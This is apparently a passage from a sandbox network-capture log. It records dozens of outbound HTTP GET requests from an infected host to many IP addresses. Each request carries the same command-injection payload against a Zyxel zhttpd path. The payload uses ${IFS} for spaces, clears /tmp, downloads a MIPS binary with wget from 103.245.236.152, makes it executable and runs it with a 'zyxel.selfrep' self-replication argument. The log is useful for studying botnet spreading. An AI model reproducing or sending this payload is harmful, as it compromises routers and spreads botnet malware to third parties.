                                      Jan 14, 2024 15:50:38.103224039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2332192.168.2.145482445.58.73.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103251934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2333192.168.2.144739262.241.254.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103276014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2334192.168.2.144775287.206.128.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103326082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2335192.168.2.1445250112.24.54.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103374958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2336192.168.2.144091820.24.152.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103393078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2337192.168.2.144568696.71.155.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103454113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2338192.168.2.1434810136.209.93.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103492022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2339192.168.2.144145276.124.42.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103518009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2340192.168.2.1459970183.135.230.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103568077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2341192.168.2.145090819.114.36.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103599072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2342192.168.2.1449584142.64.131.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103646994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2343192.168.2.1453122201.67.216.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103693008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2344192.168.2.1451020219.172.10.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103730917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2345192.168.2.1460792101.172.47.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103787899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2346192.168.2.144480278.94.216.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103821039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2347192.168.2.1450086210.225.29.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103847027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2348192.168.2.1432968165.216.126.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103895903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2349192.168.2.1444462105.100.58.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:38.103930950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2350192.168.2.143694086.64.172.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116333008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2351192.168.2.1457958194.102.189.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116352081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2352192.168.2.144492883.134.126.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116425991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2353192.168.2.144267454.56.102.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116442919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2354192.168.2.1435192125.48.187.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116480112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2355192.168.2.1452644124.12.7.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116543055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2356192.168.2.145017246.5.141.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116574049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2357192.168.2.14579064.65.238.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116609097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2358192.168.2.14494469.121.88.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116641998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2359192.168.2.1438704169.231.228.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116707087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2360192.168.2.1446548134.186.189.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116733074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2361192.168.2.1460282152.59.202.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116784096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2362192.168.2.1459330140.246.140.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116812944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2363192.168.2.1446650157.47.185.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116852999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2364192.168.2.1449274133.152.187.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116887093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2365192.168.2.1455510198.110.87.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116919994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2366192.168.2.144906614.154.109.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116940022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2367192.168.2.1447978120.251.243.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.116987944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2368192.168.2.1445468125.133.94.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117005110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2369192.168.2.1435560209.14.131.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117053032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2370192.168.2.1443292193.69.179.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117101908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2371192.168.2.1439430168.181.18.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117124081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2372192.168.2.145412283.162.69.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117180109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2373192.168.2.1446596203.252.1.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117221117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2374192.168.2.143951065.223.177.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117249966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2375192.168.2.1435398113.82.106.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117300034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2376192.168.2.145710881.52.20.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117327929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2377192.168.2.1435702134.103.122.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117371082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2378192.168.2.1442338205.146.182.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117386103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2379192.168.2.1460644186.3.31.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117439985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2380192.168.2.1437526101.25.123.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117482901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2381192.168.2.145943480.101.217.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117511988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2382192.168.2.1448058120.163.107.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117578983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2383192.168.2.145163045.208.171.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117614985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2384192.168.2.1446790125.248.220.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117640018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2385192.168.2.144786212.14.205.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117667913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2386192.168.2.1451882209.225.171.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117696047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2387192.168.2.1444088159.1.166.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117733955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2388192.168.2.143681096.180.12.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117786884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2389192.168.2.1444172221.2.68.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117814064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2390192.168.2.1438208218.65.16.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117863894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2391192.168.2.144816631.237.207.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117911100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2392192.168.2.145383894.249.149.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117944002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2393192.168.2.145805268.243.149.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:39.117999077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2394192.168.2.1436414188.26.100.169443
                                      TimestampBytes transferredDirectionData
